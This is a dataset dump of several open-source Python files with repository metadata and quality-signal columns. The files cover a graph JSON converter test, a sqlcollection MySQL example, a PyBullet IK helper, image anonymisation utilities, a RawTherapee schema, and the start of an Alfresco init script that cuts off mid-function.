hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | 
qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b2d8531598d9aed3244b9e32b3471f4b1cb73d1f | 617 | py | Python | back/tests/test_converters.py | ubbonolte/linkmaps | 0f077f1d99ea3d1ea8cf672569a80899e1210203 | [
"MIT"
] | null | null | null | back/tests/test_converters.py | ubbonolte/linkmaps | 0f077f1d99ea3d1ea8cf672569a80899e1210203 | [
"MIT"
] | null | null | null | back/tests/test_converters.py | ubbonolte/linkmaps | 0f077f1d99ea3d1ea8cf672569a80899e1210203 | [
"MIT"
] | null | null | null | from converters import JSONConverter
from . import mock_db
def test_json_converter():
"""Test Empty-Graph"""
g = mock_db.graph_empty
converter = JSONConverter()
encoded_g = converter.encode(g)
assert encoded_g == '{"nodes": [], "edges": [], "attributes": {}}'
"""Test A-B-Graph"""
g = mock_db.graph_a_b
converter = JSONConverter()
encoded_g = converter.encode(g)
print(type(encoded_g), encoded_g)
assert '{"data": {"id": "node_a", "a": 1}}' in encoded_g
assert '[{"data": {"id": "node_a_node_b", "source": "node_a", "target": "node_b", "a": 1}}]' in encoded_g
| 24.68 | 109 | 0.619125 | 84 | 617 | 4.297619 | 0.357143 | 0.155125 | 0.055402 | 0.066482 | 0.531856 | 0.393352 | 0.393352 | 0 | 0 | 0 | 0 | 0.004024 | 0.194489 | 617 | 24 | 110 | 25.708333 | 0.722334 | 0.025932 | 0 | 0.307692 | 0 | 0.076923 | 0.28 | 0 | 0 | 0 | 0 | 0 | 0.230769 | 1 | 0.076923 | false | 0 | 0.153846 | 0 | 0.230769 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2d9e6a913ef8ff911ce6ea6cb8509a91b4760c9 | 1,597 | py | Python | mysql_example.py | knlambert/sqlcollection | bd5408c00e62c5284de8a70743a28032bbfaf9ba | [
"MIT"
] | null | null | null | mysql_example.py | knlambert/sqlcollection | bd5408c00e62c5284de8a70743a28032bbfaf9ba | [
"MIT"
] | null | null | null | mysql_example.py | knlambert/sqlcollection | bd5408c00e62c5284de8a70743a28032bbfaf9ba | [
"MIT"
] | null | null | null | # coding: utf-8
from sqlcollection import Client
# import logging
# logging.basicConfig()
# logging.getLogger('sqlalchemy.engine').setLevel(logging.INFO)
#
# lookup=[
# {
# u"to": u"hour",
# u"localField": u"project",
# u"from": u"project",
# u"foreignField": u"id",
# u"as": u"project"
# }, {
# u"to": u"project",
# u"localField": u"client",
# u"from": u"client",
# u"foreignField": u"id",
# u"as": u"project.client"
# }
# ]
import json
import datetime
client = Client(url=u'mysql+mysqlconnector://root:localroot1234@127.0.0.1/')
user = client.user_api._user
description = user.get_description(auto_lookup=3)
print(json.dumps(description, indent=4))
cursor = user.find(query={}, auto_lookup=1).sort(u"id").limit(2).skip(0)
for item in cursor:
print(item)
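# Note on the chain above: find() returns a cursor and sort()/limit()/skip()
# each return that cursor again, allowing pymongo-style chaining; the SQL
# appears to run only when the cursor is iterated. (Inferred from this
# example's usage, not from sqlcollection's documentation.)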
#
# print(u"___count")
# count = hour.find(auto_lookup=0).limit(3).count()
# print(count)
#
# print(u"___count with_limit_and_skip")
# count = hour.find(auto_lookup=0).limit(3).count(with_limit_and_skip=True)
# print(count)
# quit()
#
# ret = user.insert_one({
# "email": "test2",
# "name": "test",
# "hash": "test",
# "salt": "test",
# "customer_id": {
# "id": 1
# }
# }, auto_lookup=1)
# print(ret.inserted_id)
# #
ret = user.delete_many({
u"customer_id.id": 2
}, auto_lookup=3)
#
# ret = hour.update_many({
# u"project.id": 2
# }, {
# u"$set": {
# u"issue": u"updated",
# u"project": {
# u"id": 1
# }
# }
# }, auto_lookup=3)
| 22.180556 | 76 | 0.562304 | 209 | 1,597 | 4.162679 | 0.358852 | 0.064368 | 0.051724 | 0.036782 | 0.185057 | 0.142529 | 0.142529 | 0.142529 | 0.08046 | 0 | 0 | 0.023083 | 0.240451 | 1,597 | 71 | 77 | 22.492958 | 0.694147 | 0.657483 | 0 | 0 | 0 | 0 | 0.137931 | 0.105477 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.230769 | 0 | 0.230769 | 0.153846 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2dcd6dd9f58b630450aff63b110100216ce85b7 | 7,260 | py | Python | pyreach/ik_pybullet/ik_pybullet.py | google-research/pyreach | f91753ce7a26e77e122eb02a9fdd5a1ce3ce0159 | [
"Apache-2.0"
] | 13 | 2021-09-01T01:10:22.000Z | 2022-03-05T10:01:52.000Z | pyreach/ik_pybullet/ik_pybullet.py | google-research/pyreach | f91753ce7a26e77e122eb02a9fdd5a1ce3ce0159 | [
"Apache-2.0"
] | null | null | null | pyreach/ik_pybullet/ik_pybullet.py | google-research/pyreach | f91753ce7a26e77e122eb02a9fdd5a1ce3ce0159 | [
"Apache-2.0"
] | 6 | 2021-09-20T21:17:53.000Z | 2022-03-14T18:42:48.000Z | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for PyBullet IK."""
import os
import sys
from typing import Any
from absl import logging # type: ignore
import numpy as np # type: ignore
import six
from pyreach.common.base import transform_util
import pybullet # type: ignore
import pybullet_data # type: ignore
import pybullet_utils.bullet_client as bullet_client # type: ignore
XARM_URDF_PATH = ('third_party/bullet/examples/pybullet/gym/pybullet_data/'
'xarm/xarm6_robot.urdf')
def _load_g3_resources(load_fn: Any, file_path: str, *args: Any,
**kwargs: Any) -> Any:
"""Wraps the PyBullet loadURDF to support g3 resource loading.
May need to write to the local file system, so make sure tmpfs is enabled
on Borg.
Args:
load_fn: A function to load the file.
file_path: the file to be loaded.
*args: Other arguments. Check PyBullet documentation for details.
**kwargs: Other keyword arguments. Check PyBullet documentation for details.
Returns:
The unique URDF id if successful.
"""
g3_file_path = file_path
if not six.ensure_str(g3_file_path).startswith('google3/'):
g3_file_path = os.path.join('google3', g3_file_path)
file_dir_name = os.path.dirname(g3_file_path)
# Using `skip_previous_extraction_check` since we are using the
# `filename_predicate`.
# flake8: noqa
root_dir = resources.GetARootDirWithAllResources( # type: ignore
filename_predicate=lambda x: file_dir_name in x,
skip_previous_extraction_check=True)
g3_file_path = os.path.join(root_dir, g3_file_path)
return load_fn(g3_file_path, *args, **kwargs)
def load_urdf(pybullet_client: Any, file_path: str, *args: Any,
**kwargs: Any) -> Any:
"""Loads the given URDF filepath in g3 and borg."""
if file_path.startswith('google3/'):
file_path = file_path[len('google3/'):]
# Handles most general file open case (blaze build and execute in code tree,
# or running unit tests) and CNS case if enable_cns() is called.
try:
if os.path.exists(file_path):
return pybullet_client.loadURDF(file_path, *args, **kwargs)
except pybullet_client.error:
pass
# Handles the PAR case and blaze run case. Unlikely if path is absolute.
if not file_path.startswith('/'):
try:
if os.path.exists(file_path):
return pybullet_client.loadURDF(
os.path.join('google3', file_path), *args, **kwargs)
except pybullet.error:
pass
if 'google3.pyglib.resources' in sys.modules:
try:
# Big Hammer.
return _load_g3_resources(pybullet_client.loadURDF, file_path, *args,
**kwargs)
except pybullet.error:
raise FileNotFoundError('Cannot load the URDF file {}'.format(file_path))
else:
# Handles project-reach case.
try:
if file_path.startswith(
'third_party/bullet/examples/pybullet/gym/pybullet_data/'):
pybullet_client.setAdditionalSearchPath(pybullet_data.getDataPath())
file_path = file_path[55:]
elif file_path.startswith('robotics/'):
pybullet_client.setAdditionalSearchPath(os.environ['PYTHONPATH'])
file_path = file_path[9:]
logging.info('Loading URDF %s', file_path)
return pybullet_client.loadURDF(file_path, *args, **kwargs)
except pybullet.error:
raise FileNotFoundError('Cannot load the URDF file {}'.format(file_path))
class IKPybullet:
"""PyBullet IK."""
def __init__(self) -> None:
self._connection_mode = pybullet.DIRECT
self._pybullet_client = bullet_client.BulletClient(self._connection_mode)
self._effector_link = 6
self._arm_urdf = load_urdf(self._pybullet_client, XARM_URDF_PATH, [0, 0, 0])
joints = []
joint_indices = []
for i in range(self._pybullet_client.getNumJoints(self._arm_urdf)):
joint_info = self._pybullet_client.getJointInfo(self._arm_urdf, i)
if joint_info[2] == pybullet.JOINT_REVOLUTE:
joints.append(joint_info[0])
joint_indices.append(i)
self._n_joints = len(joints)
self._joints = tuple(joints)
self._joint_indices = tuple(joint_indices)
def _set_joints(self, joints_values: np.ndarray) -> None:
for i in range(self._n_joints):
self._pybullet_client.resetJointState(self._arm_urdf, self._joints[i],
joints_values[i])
def _get_joints(self) -> np.ndarray:
joint_states = self._pybullet_client.getJointStates(self._arm_urdf,
self._joint_indices)
joint_positions = np.array([state[0] for state in joint_states])
return joint_positions
def ik_search(self, target_effector_pose: np.ndarray,
current_joints: np.ndarray) -> np.ndarray:
"""Inverse kinematics.
Args:
target_effector_pose: Target pose for the robot's end effector.
current_joints: The current joints of the robot.
Returns:
Numpy array with required joint angles to reach the requested pose.
"""
self._set_joints(current_joints)
translation = target_effector_pose[0:3]
quaternion_xyzw = transform_util.axis_angle_to_quaternion(
target_effector_pose[3:])
target_joints = np.array(
self._pybullet_client.calculateInverseKinematics(
self._arm_urdf,
self._effector_link,
translation,
quaternion_xyzw,
# TODO: use real limits. pylint: disable=g-bad-todo
lowerLimits=[-17] * 6,
upperLimits=[17] * 6,
jointRanges=[17] * 6,
# pylint: disable=g-bad-todo
# TODO: Understand why examples don't use actual positions for
# the first two joints. Taken from
# `pybullet/gym/pybullet_robots/xarm/xarm_sim.py`
restPoses=[0, 0] + self._get_joints()[2:].tolist(),
maxNumIterations=500,
residualThreshold=1e-4))
self._set_joints(target_joints)
return target_joints
def fk(self, current_joints: np.ndarray) -> np.ndarray:
"""Forward kinematics.
Args:
current_joints: The current joints of the robot.
Returns:
Numpy array with the end-effector pose.
"""
self._set_joints(current_joints)
ee_link_state = self._pybullet_client.getLinkState(
self._arm_urdf, self._effector_link, 0, computeForwardKinematics=True)
ee_link_pose = np.array(ee_link_state[4] + ee_link_state[5])
quaternion_xyzw = np.asarray(
[ee_link_pose[3], ee_link_pose[4], ee_link_pose[5], ee_link_pose[6]])
pose = transform_util.pos_quaternion_to_pose(ee_link_pose[0:3],
quaternion_xyzw)
return pose
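# Round-trip sketch (assumes pybullet and the bundled xArm URDF resolve;
# the target values are illustrative):
# ik = IKPybullet()
# target = np.array([0.3, 0.0, 0.3, 0.0, 3.14, 0.0])  # x, y, z + axis-angle
# joints = ik.ik_search(target, current_joints=np.zeros(6))
# recovered = ik.fk(joints)  # should approximate `target` within IK tolerance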
| 35.588235 | 80 | 0.681956 | 961 | 7,260 | 4.924037 | 0.304891 | 0.052409 | 0.016906 | 0.019019 | 0.236475 | 0.212806 | 0.14814 | 0.140321 | 0.120456 | 0.106509 | 0 | 0.011901 | 0.224518 | 7,260 | 203 | 81 | 35.763547 | 0.828597 | 0.280579 | 0 | 0.168142 | 0 | 0 | 0.055752 | 0.030428 | 0 | 0 | 0 | 0.004926 | 0 | 1 | 0.061947 | false | 0.017699 | 0.088496 | 0 | 0.230089 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2dcd8252012f561fefda3aeaea2f7eef68802a0 | 2,795 | py | Python | anonympy/images/utils_images.py | ArtLabss/open-data-anonimizer | 48bf790e90718915363b126e40580392cb64e277 | [
"BSD-3-Clause"
] | 29 | 2021-12-20T15:19:44.000Z | 2022-02-07T10:03:57.000Z | anonympy/images/utils_images.py | ArtLabss/open-data-anonimizer | 48bf790e90718915363b126e40580392cb64e277 | [
"BSD-3-Clause"
] | 2 | 2022-02-07T14:52:37.000Z | 2022-03-29T01:50:40.000Z | anonympy/images/utils_images.py | ArtLabss/open-data-anonimizer | 48bf790e90718915363b126e40580392cb64e277 | [
"BSD-3-Clause"
] | 2 | 2021-12-21T05:03:33.000Z | 2022-01-06T17:59:21.000Z | # Supplementary functions and variables
import random
import numpy as np
import cv2
def find_middle(x, y, w, h) -> tuple:
'''
Find the center of a rectangle.
The center of a rectangle is the midpoint of its diagonal end points.
'''
x1, y1 = x, y
x2, y2 = x + w, y + h
m1, m2 = int((x1 + x2)/2), int((y1 + y2)/2)
return m1, m2
def find_radius(x, y, w, h) -> tuple:
'''
Find the distance between the rectangle's center and the middle of its side edge.
'''
side_middle = x + w, (y + y + h) / 2
center = find_middle(x, y, w, h)
dis = side_middle[0] - center[0]
return dis
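# Worked example: for a bounding box with x=40, y=60, w=100, h=80:
# find_middle(40, 60, 100, 80) -> (90, 100)
# find_radius(40, 60, 100, 80) -> 140 - 90 = 50 (side-middle x minus center x)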
def sap_noise(frame, seed=None):
random.seed(seed)
img = frame.copy()
# Getting the dimensions of the image
row, col, _ = img.shape
# Randomly pick some pixels in the
# image for coloring them white
# Pick a random number of pixels between 8000 and 15000
number_of_pixels = random.randint(8000, 15000)
for i in range(number_of_pixels):
# Pick a random y coordinate
y_coord = random.randint(0, row - 1)
# Pick a random x coordinate
x_coord = random.randint(0, col - 1)
# Color that pixel to white
img[y_coord][x_coord] = 255
# Randomly pick some pixels in
# the image for coloring them black
# Pick a random number of pixels between 8000 and 15000
number_of_pixels = random.randint(8000, 15000)
for i in range(number_of_pixels):
# Pick a random y coordinate
y_coord = random.randint(0, row - 1)
# Pick a random x coordinate
x_coord = random.randint(0, col - 1)
# Color that pixel to black
img[y_coord][x_coord] = 0
return img
def pixelated(image, blocks=20):
(h, w) = image.shape[:2]
xSteps = np.linspace(0, w, blocks + 1, dtype="int")
ySteps = np.linspace(0, h, blocks + 1, dtype="int")
for i in range(1, len(ySteps)):
for j in range(1, len(xSteps)):
# compute the starting and ending (x, y)-coordinates
# for the current block
startX = xSteps[j - 1]
startY = ySteps[i - 1]
endX = xSteps[j]
endY = ySteps[i]
# extract the ROI using NumPy array slicing, compute the
# mean of the ROI, and then draw a rectangle with the
# mean RGB values over the ROI in the original image
roi = image[startY:endY, startX:endX]
(B, G, R) = [int(x) for x in cv2.mean(roi)[:3]]
cv2.rectangle(image, (startX, startY), (endX, endY), (B, G, R), -1)
return image
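# Minimal usage sketch (the file path is illustrative):
# image = cv2.imread("face.jpg")
# anonymized = pixelated(image, blocks=20)  # fewer blocks => coarser pixelation
# cv2.imwrite("face_pixelated.jpg", anonymized)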
def resize(self, new_width=500):
height, width, _ = self.frame.shape
ratio = height / width
new_height = int(ratio * new_width)
return cv2.resize(self.frame, (new_width, new_height))
| 32.126437 | 79 | 0.602147 | 424 | 2,795 | 3.900943 | 0.304245 | 0.018138 | 0.039903 | 0.045949 | 0.356711 | 0.338573 | 0.303507 | 0.303507 | 0.303507 | 0.303507 | 0 | 0.042111 | 0.294812 | 2,795 | 86 | 80 | 32.5 | 0.797057 | 0.310197 | 0 | 0.170213 | 0 | 0 | 0.003207 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.106383 | false | 0 | 0.06383 | 0 | 0.276596 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2dd5fc08ae790d026fe0c35d53a86396def0913 | 808 | py | Python | profile_generator/feature/tone/contrast/local/schema/schema.py | nethy/profile-generator | 9bc54bed36b84b45902d75a273739480b4ff2204 | [
"MIT"
] | null | null | null | profile_generator/feature/tone/contrast/local/schema/schema.py | nethy/profile-generator | 9bc54bed36b84b45902d75a273739480b4ff2204 | [
"MIT"
] | null | null | null | profile_generator/feature/tone/contrast/local/schema/schema.py | nethy/profile-generator | 9bc54bed36b84b45902d75a273739480b4ff2204 | [
"MIT"
] | null | null | null | from collections.abc import Mapping
from typing import Any
from profile_generator.model.view import raw_therapee
from profile_generator.model.view.raw_therapee import EqPoint
from profile_generator.schema import object_of, range_of
_WL_ENABLED = "WaveletEnabled"
_WL_CURVE = "WaveletOpacityCurveWL"
_DEFAULT_LOCAL_CONTRAST = 0
def _process(data: Any) -> Mapping[str, str]:
value = data.get("local", _DEFAULT_LOCAL_CONTRAST)
amount = 0.5 + 0.05 * value
curve = raw_therapee.CurveType.STANDARD + raw_therapee.present_equalizer(
(EqPoint(0, 0.5), EqPoint(0.25, amount), EqPoint(0.75, amount), EqPoint(1, 0.5))
)
enabled = str(value > _DEFAULT_LOCAL_CONTRAST).lower()
return {_WL_ENABLED: enabled, _WL_CURVE: curve}
SCHEMA = object_of({"local": range_of(0, 10)}, _process)
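# Worked examples of _process (values follow directly from the formula above):
# {"local": 4} -> amount = 0.5 + 0.05 * 4 = 0.7, WaveletEnabled "true"
# {}           -> amount = 0.5 (flat equalizer), WaveletEnabled "false"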
| 32.32 | 88 | 0.747525 | 113 | 808 | 5.070796 | 0.40708 | 0.076789 | 0.104712 | 0.08726 | 0.101222 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030347 | 0.143564 | 808 | 24 | 89 | 33.666667 | 0.797688 | 0 | 0 | 0 | 0 | 0 | 0.055693 | 0.02599 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.294118 | 0 | 0.411765 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2ddaa7376cc318fcf695eb03b2656615025fd00 | 29,440 | py | Python | assets/init.py | wangmuy/docker-alfresco | a37802125f29e86d1247ed2ed6ae77e5789fa079 | [
"MIT"
] | null | null | null | assets/init.py | wangmuy/docker-alfresco | a37802125f29e86d1247ed2ed6ae77e5789fa079 | [
"MIT"
] | null | null | null | assets/init.py | wangmuy/docker-alfresco | a37802125f29e86d1247ed2ed6ae77e5789fa079 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import json
import os
import re
import shutil
import sys
import time
__author__ = 'Sebastien LANGOUREAUX'
ALFRESCO_PATH = '/opt/alfresco'
ALFRESCO_GLOBAL_BAK = ALFRESCO_PATH + '/alf_data/alfresco-global.properties.bak'
ALFRESCO_LDAP_BAK = ALFRESCO_PATH + '/alf_data/ldap-authentication.properties.bak'
class ServiceRun():
skipSetupGlobal = False
skipSetupLdap = False
def set_database_connection(self, db_type, db_host, db_port, db_name, db_user, db_password):
global ALFRESCO_PATH
if db_type not in ["postgresql", "mysql"]:
raise KeyError("DB type must be Postgresql or Mysql")
if db_type == "mysql" and (db_host == "localhost" or db_host == "127.0.0.1"):
raise KeyError("For local database, you must use Postgresql")
if db_host != "localhost" and db_host != "127.0.0.1":
self.replace_all('/etc/supervisor/conf.d/supervisord-postgresql.conf', 'autostart\s*=.*', 'autostart=false')
self.replace_all('/etc/supervisor/conf.d/supervisord-postgresql.conf', 'autorestart\s*=.*', 'autorestart=false')
else:
self.replace_all('/etc/supervisor/conf.d/supervisord-postgresql.conf', 'autostart\s*=.*', 'autostart=true')
self.replace_all('/etc/supervisor/conf.d/supervisord-postgresql.conf', 'autorestart\s*=.*', 'autorestart=true')
if self.skipSetupGlobal == True:
return
if db_host is None or db_host == "":
raise KeyError("You must provide db_host")
if db_port is None or db_port == "":
raise KeyError("You must provide db_port")
if db_name is None or db_name == "":
raise KeyError("You must provide db_name")
if db_user is None or db_user == "":
raise KeyError("You must provide db_user")
if db_password is None or db_password == "":
raise KeyError("You must provide db_password")
db_conn_params = ""
if db_type == "mysql":
db_conn_params = "?useSSL=false"
db_driver = "org.gjt.mm.mysql.Driver"
else:
db_driver = "org.postgresql.Driver"
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'db.driver\s*=.*', 'db.driver=' + db_driver)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'db.username\s*=.*', 'db.username=' + db_user)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'db.password\s*=.*', 'db.password=' + db_password)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'db.name\s*=.*', 'db.name=' + db_name)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'db.url\s*=.*', 'db.url=jdbc:' + db_type + '://' + db_host + ':' + db_port + '/' + db_name + db_conn_params)
def set_alfresco_context(self, host, port, protocol):
global ALFRESCO_PATH
if self.skipSetupGlobal == True:
return
if host is None or host == "":
raise KeyError("You must provide host")
if port is None or port == "":
raise KeyError("You must provide port")
if protocol is None or protocol == "":
raise KeyError("You must provide protocol")
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'alfresco.host\s*=.*', 'alfresco.host=' + host)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'alfresco.port\s*=.*', 'alfresco.port=' + port)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'alfresco.protocol\s*=.*', 'alfresco.protocol=' + protocol)
def set_share_context(self, host, port, protocol):
global ALFRESCO_PATH
if self.skipSetupGlobal == True:
return
if host is None or host == "":
raise KeyError("You must provide host")
if port is None or port == "":
raise KeyError("You must provide port")
if protocol is None or protocol == "":
raise KeyError("You must provide protocol")
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'share.host\s*=.*', 'share.host=' + host)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'share.port\s*=.*', 'share.port=' + port)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'share.protocol\s*=.*', 'share.protocol=' + protocol)
def set_ftp(self, enable, port):
global ALFRESCO_PATH
if self.skipSetupGlobal == True:
return
if port is None or port == "":
raise KeyError("You must provide port")
if enable not in ["true", "false"]:
raise KeyError("Enable must be true or false")
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'ftp.enabled\s*=.*', 'ftp.enabled=' + enable)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'ftp.port\s*=.*', 'ftp.port=' + port)
def set_core(self, environment):
global ALFRESCO_PATH
if self.skipSetupGlobal == True:
return
if environment not in ["UNKNOWN", "TEST", "BACKUP", "PRODUCTION"]:
raise KeyError("Environment must be UNKNOWN, TEST, BACKUP or PRODUCTION")
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'system.serverMode\s*=.*', 'system.serverMode=' + environment)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'alfresco.authentification.allowGuestLogin\s*=.*', 'alfresco.authentification.allowGuestLogin=false')
def set_mail(self, host, port, user, password, protocol, starttls_enable, mail_sender):
global ALFRESCO_PATH
if self.skipSetupGlobal == True:
return
if host is not None and host != "":
if port is None or port == "":
raise KeyError("You must provide port")
if protocol is None or protocol == "":
raise KeyError("You must provide protocol")
if mail_sender is None or mail_sender =="":
raise KeyError("You must provide the mail sender")
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.host\s*=.*', 'mail.host=' + host)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.port\s*=.*', 'mail.port=' + port)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.protocol\s*=.*', 'mail.protocol=' + protocol)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.from.default\s*=.*', 'mail.from.default=' + mail_sender)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.from.enabled\s*=.*', 'mail.from.enabled=false')
else:
